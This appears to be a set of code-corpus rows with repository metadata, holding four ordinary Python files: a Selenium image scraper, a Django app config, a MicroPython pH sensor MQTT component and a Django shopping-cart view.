d52d59665cb3b59e68269b407fe65d6b94b3f230 | 7891d4ece938533e13872506b0d93b3669cbd29f | /ImageDownload.py | 6c188df46e7a0dd4a9950500227fe2fa10e3abdc | [] | no_license | nimishbansal/ImageDownloader | 42ef6513a0d58d9a0ca331709384c2f8bc11d278 | 94bcfa5223591a1fd5041e87aa07cb13a8e5e911 | refs/heads/master | 2020-05-29T21:59:05.701937 | 2019-05-30T10:59:47 | 2019-05-30T10:59:47 | 189,398,104 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,928 | py | from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import time
import os
import requests
import threading
import pygame
from PyQt5 import QtCore, QtWidgets
from PyQt5.QtCore import pyqtSignal,QObject
def downloadImage(url,counter,keyword="None"):
import urllib
format=url[url.rindex("."):]
try:
urllib.request.urlretrieve(url, "/home/nimish/Documents/images/"+keyword + str(counter) + format)
except Exception as E:
print("Error in downloadImage function")
class myListWithSignal(QObject):
downloadSignal = pyqtSignal()
def __init__(self):
super(myListWithSignal, self).__init__()
self.myInternalList = []
def append(self, object):
self.myInternalList.append(object)
self.downloadSignal.emit()
def getLastElement(self):
return self.myInternalList[-1]
class Process():
def __init__(self,keyword,count=10,parent=None):
self.driver=None
self.keyword=keyword
self.myUrls=[]
self.parent=parent
self.myElements1=None
def startProcess(self):
self.driver = webdriver.Chrome("/home/nimish/PycharmProjects/so/internship/macroproject/chromedriver")
self.driver.get("http://google.co.in/images")
self.driver.find_element_by_css_selector(".gLFyf.gsfi").send_keys(self.keyword + Keys.RETURN)
time.sleep(3)
self.myElements = self.driver.find_elements_by_tag_name("img")
self.myElements1 = list(filter(lambda i: i.get_attribute('class') == 'rg_ic rg_i', self.myElements))
mainUrl = self.driver.current_url
try:
for j in range(10):
self.myElements = self.driver.find_elements_by_tag_name("img")
self.myElements1 = list(filter(lambda i: i.get_attribute('class') == 'rg_ic rg_i', self.myElements))
self.myElements1[j].click()
try:
viewImageButton=self.driver.find_elements_by_css_selector(".irc_fsl.i3596")
except:
print("viewImageButton not found")
# time.sleep(1)
for i in range(len(viewImageButton)):
if (viewImageButton[i].text=='View image'):
self.myUrls.append(viewImageButton[i].get_attribute('href'))
self.lastThread=threading.Thread(target=downloadImage,args=(self.myUrls.getLastElement(),j,self.keyword))
self.lastThread.start()
break
self.lastThread.join()
self.driver.quit()
self.onFinish()
except Exception as E:
print(E)
def onFinish(self):
pygame.init()
pygame.mixer.music.load("sound.mp3")
pygame.mixer.music.play()
if __name__=="__main__":
classobject=Process("company_logo",10,None)
classobject.startProcess()
| [
"noreply@github.com"
] | nimishbansal.noreply@github.com |
8599015f37a249c596af3f4c0e0ef8c100111f87 | d7049d63e791a257cf2685bbfd03cf5196d5f640 | /Courses_PatrickL_Christine_Ronald_Kennedy_JohnEboh/apps/courseAssign/apps.py | 00d815ad80a9b24b04c7f546d64d4f3ec5bb74ab | [] | no_license | dancinturtle/coursesFeb17 | e4825d98d02fe85477f5d4a6a1286e728c35b080 | c17f9a26c802af93fd9423ae79a33d425cf3f75c | refs/heads/master | 2021-01-19T12:48:47.517891 | 2017-02-22T03:23:56 | 2017-02-22T03:23:56 | 82,342,427 | 0 | 26 | null | 2017-02-22T19:12:56 | 2017-02-17T22:09:49 | Python | UTF-8 | Python | false | false | 140 | py | from __future__ import unicode_literals
from django.apps import AppConfig
class CourseassignConfig(AppConfig):
name = 'courseAssign'
| [
"pleung1987@gmail.com"
] | pleung1987@gmail.com |
a86a7a429a1c481e2685f5caf34c0993ec1fc365 | 8b3d00f7c0029a4974a5df2072ea21649d2b8829 | /dev/phSensor.py | 667d8504029009b66e6cf7bf3dbfbbfc711c7daa | [
"MIT"
] | permissive | dasTholo/pysmartnode | 29dd521b5f5374456b4300ec19b1c4bdf45a5dca | 90b0ae05e307433c4a904017902ffadd13835cef | refs/heads/master | 2021-01-05T02:41:45.897597 | 2020-02-18T16:08:34 | 2020-02-18T16:08:34 | 240,849,533 | 0 | 0 | MIT | 2020-02-18T19:37:13 | 2020-02-16T07:23:49 | Python | UTF-8 | Python | false | false | 5,269 | py | # Author: Kevin Köck
# Copyright Kevin Köck 2019 Released under the MIT license
# Created on 2019-05-11
"""
example config:
{
package: .sensors.phSensor
component: PHsensor
constructor_args: {
adc: 22 # ADC object/pin number
adc_multi: 1.52 # ADC multiplicator when using voltage divider (needed on esp when sensor probe not connected as voltage goes to 5V then)
precision: 2 # precision of the pH value published
voltage_calibration_0: 2.54 # voltage at pH value #0
pH_calibration_value_0: 6.86 # pH value for calibration point #0
voltage_calibration_1: 3.04 # voltage at pH value #1
pH_calibration_value_1: 4.01 # pH value for calibration point #1
# interval: 600 # optional, defaults to 600. -1 means do not automatically read sensor and publish values
# mqtt_topic: sometopic # optional, defaults to home/<controller-id>/PHsensor
# friendly_name: null # optional, friendly name shown in homeassistant gui with mqtt discovery
}
}
Inspiration from: https://scidle.com/how-to-use-a-ph-sensor-with-arduino/
Example measurements:
situation, real, esp
shorted, 2.61 2.5
destilled 2.73 2.6
ph4.01 3.14 3.0
ph6.86 2.68 2.53
growing solution 3.24 3.1 (this is very wrong.., ph actually ~5.2)
"""
__updated__ = "2019-11-01"
__version__ = "0.6"
from pysmartnode import config
from pysmartnode.components.machine.adc import ADC
from pysmartnode import logging
import uasyncio as asyncio
from pysmartnode.utils.component import Component
import gc
COMPONENT_NAME = "PHsensor"
_COMPONENT_TYPE = "sensor"
_log = logging.getLogger(COMPONENT_NAME)
_mqtt = config.getMQTT()
gc.collect()
_unit_index = -1
PH_TYPE = '"unit_of_meas":"pH",' \
'"val_tpl":"{{ value|float }}",' \
'"ic":"mdi:alpha-p-circle-outline"'
_VAL_T_ACIDITY = "{{ value|float }}"
class PHsensor(Component):
def __init__(self, adc, adc_multi, voltage_calibration_0, pH_calibration_value_0,
voltage_calibration_1, pH_calibration_value_1,
precision=2, interval=None, mqtt_topic=None,
friendly_name=None, discover=True):
# This makes it possible to use multiple instances of MySensor
global _unit_index
_unit_index += 1
super().__init__(COMPONENT_NAME, __version__, _unit_index, discover)
self._interval = interval or config.INTERVAL_SENSOR_PUBLISH
self._topic = mqtt_topic
self._frn = friendly_name
self._adc = ADC(adc)
self._adc_multi = adc_multi
self.__ph = None
self._prec = int(precision)
self._v0 = voltage_calibration_0
self._v1 = voltage_calibration_1
self._ph0 = pH_calibration_value_0
self._ph1 = pH_calibration_value_1
gc.collect()
if self._interval > 0: # if interval==-1 no loop will be started
asyncio.get_event_loop().create_task(self._loop())
async def _loop(self):
interval = self._interval
while True:
self.__ph = await self._read()
await asyncio.sleep(interval)
async def _discovery(self, register=True):
name = "{!s}{!s}".format(COMPONENT_NAME, self._count)
if register:
await self._publishDiscovery(_COMPONENT_TYPE, self.acidityTopic(), name, PH_TYPE,
self._frn or "pH")
else:
await self._deleteDiscovery(_COMPONENT_TYPE, name)
async def _read(self, publish=True, timeout=5) -> float:
buf = []
for _ in range(10):
buf.append(self._adc.readVoltage() * self._adc_multi)
await asyncio.sleep_ms(50)
buf.remove(max(buf))
buf.remove(max(buf))
buf.remove(min(buf))
buf.remove(min(buf))
v = 0
for i in range(len(buf)):
v += buf[i]
v /= len(buf)
ph1 = self._ph1
ph0 = self._ph0
v0 = self._v0
v1 = self._v1
m = (ph1 - ph0) / (v1 - v0)
b = (ph0 * v1 - ph1 * v0) / (v1 - v0)
print("U", v)
print("m", m)
print("b", b)
value = m * v + b
value = round(value, self._prec)
print("pH", value)
if value > 14:
await _log.asyncLog("error",
"Not correctly connected, voltage {!s}, ph {!s}".format(v, value))
return None
if publish:
await _mqtt.publish(self.acidityTopic(),
("{0:." + str(self._prec) + "f}").format(value),
timeout=timeout, await_connection=False)
return value
async def acidity(self, publish=True, timeout=5, no_stale=False) -> float:
if self._interval == -1 or no_stale:
return await self._read(publish, timeout)
return self.__ph
@staticmethod
def acidityTemplate():
"""Other components like HVAC might need to know the value template of a sensor"""
return _VAL_T_ACIDITY
def acidityTopic(self):
return self._topic or _mqtt.getDeviceTopic("{!s}{!s}".format(COMPONENT_NAME, self._count))
| [
"kevinkk525@users.noreply.github.com"
] | kevinkk525@users.noreply.github.com |
c56de4ee7b33bef4406aa64f9e855ce8969ed701 | 464ba6b8119dfda26fbd77f31e600556c091147f | /store/views/cart.py | 3546861bd02ee174e562b4de5e418aa507104662 | [] | no_license | praveen9964/Tshirt-store | 5db88cf529927b3e9c1fb26ec3f19c9177394b49 | 2f9d8d3c05c555cd2c68653b543861f292cc7e9a | refs/heads/main | 2023-07-15T15:03:16.092448 | 2021-08-31T17:26:01 | 2021-08-31T17:26:01 | 401,783,162 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,040 | py | from django.shortcuts import render , HttpResponse, redirect
from store.forms.authforms import CustomerCreationForm,CustomerAuthForm #this is from authforms.py file
from django.contrib.auth.forms import AuthenticationForm #for built in login form
from django.contrib.auth import authenticate, login as loginUser,logout #used for login authentication
#the above authenticate,login and logout are predefined( existing by django)
from store.forms import CheckForm
from store.models import Tshirt,SizeVariant, Cart , Order , OrderItem , Payment, Occasion,IdealFor,NeckType,Sleeve,Brand,Color
from math import floor
from django.contrib.auth.decorators import login_required
def add_to_cart(request,slug,size):
user=None
if request.user.is_authenticated:
user=request.user
cart = request.session.get('cart')
if cart is None:
cart=[]
tshirt=Tshirt.objects.get(slug=slug)
add_cart_to_anom_user(cart,size,tshirt)
if user is not None:
add_cart_to_database(user,size,tshirt)
request.session['cart'] = cart #again inserting into session =cart is a list
#print( slug, size)
return_url=request.GET.get('return_url') #to return to productdetail page again after clicking add to cart
return redirect(return_url) #redirecting to the same product page
def add_cart_to_database(user,size,tshirt):
size=SizeVariant.objects.get(size=size,tshirt = tshirt)
existing=Cart.objects.filter(user=user,sizeVariant=size)
if len(existing) > 0:
obj= existing[0]
obj.quantity = obj.quantity + 1
obj.save() #saving for
else:
c=Cart() #creating an object for CART Table
c.user=user #insert into cart table values for user and below for sizevariant
c.sizeVariant=size
c.quantity=1
c.save() #folr saving cart object
def add_cart_to_anom_user(cart,size,tshirt):
flag = True
for cart_obj in cart:
t_id=cart_obj.get('tshirt') #will get tshirt id
size_short=cart_obj.get('size') #will get size of tshirt
if t_id == tshirt.id and size == size_short:
flag=False
cart_obj['quantity'] = cart_obj['quantity']+1
if flag:
cart_obj={
'tshirt':tshirt.id,
'size':size,
'quantity': 1
}
cart.append(cart_obj)
def cart(request):
cart=request.session.get('cart')
if cart is None:
cart=[]
for c in cart:
tshirt_id=c.get('tshirt') #getting id of tshirt added to cart
tshirt=Tshirt.objects.get(id=tshirt_id) #getting data from Tshirt Model
c['tshirt']=tshirt #tshirt in dictionary will be updated with tshirt name as a object
c['size']=SizeVariant.objects.get(tshirt=tshirt_id,size=c['size'])
print(cart)
return render(request , template_name='store/cart.html', context={'cart' : cart}) #to view cart page
| [
"kumarkp547@gmail.com"
] | kumarkp547@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.